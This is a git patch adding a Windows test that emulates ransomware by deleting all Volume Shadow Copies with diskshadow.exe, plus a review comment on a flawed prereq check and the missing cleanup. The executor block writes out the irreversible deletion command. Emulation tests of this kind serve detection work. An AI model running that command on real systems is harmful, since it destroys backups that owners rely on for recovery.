From 256876632cd5b5eff495ef5ff57bd3c0ca30be48 Mon Sep 17 00:00:00 2001
From: cyb3rjy0t
Date: Wed, 7 Jan 2026 02:30:15 -0500
Subject: [PATCH] Update T1490 to include Diskshadow.exe test (#3253)
Co-authored-by: Bhavin Patel
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
---
 atomics/T1490/T1490.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index 5bedb437..35cb2539 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -184,3 +184,21 @@ atomic_tests:
 cleanup_command: sudo tmutil enable
 name: sh
 elevation_required: true
+- name: Windows - Delete Volume Shadow Copies via Diskshadow
+ description: |
+ Deletes Windows Volume Shadow Copies via Diskshadow binary. This technique is used by numerous ransomware families such as Crytox. The binary is present by default in Windows Server operating systems (since Windows Server 2008). Upon execution, it will delete all shadow copies of the server.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
+ prereq_command: |
+ if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
+ get_prereq_command: |
+ vssadmin.exe create shadow /for=c:
+ executor:
+ command: |
+ "delete shadows all" | diskshadow.exe
+ name: powershell
+ elevation_required: true
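Review bot: The prereq_command keys its check on the English text "No items found that satisfy the query.", so on a non-English Windows install findstr never matches, the check exits 0 even when no shadow copy exists, and the executor then runs against nothing while the test reports its prerequisite as satisfied. A locale-independent check would be `if((Get-CimInstance -ClassName Win32_ShadowCopy | Measure-Object).Count -gt 0) { exit 0 } else { exit 1 }`, which also avoids parsing vssadmin output. The test has no cleanup_command; since `delete shadows all` removes pre-existing shadow copies as well as the one the prereq creates, the description should state that the deletion is not reversible and that the test is only appropriate on a disposable host, and the supported_platforms / description wording should agree with the prereq note that vssadmin create shadow is limited to Windows Server or Windows 8. The atomic_tests list this entry extends begins before the hunk.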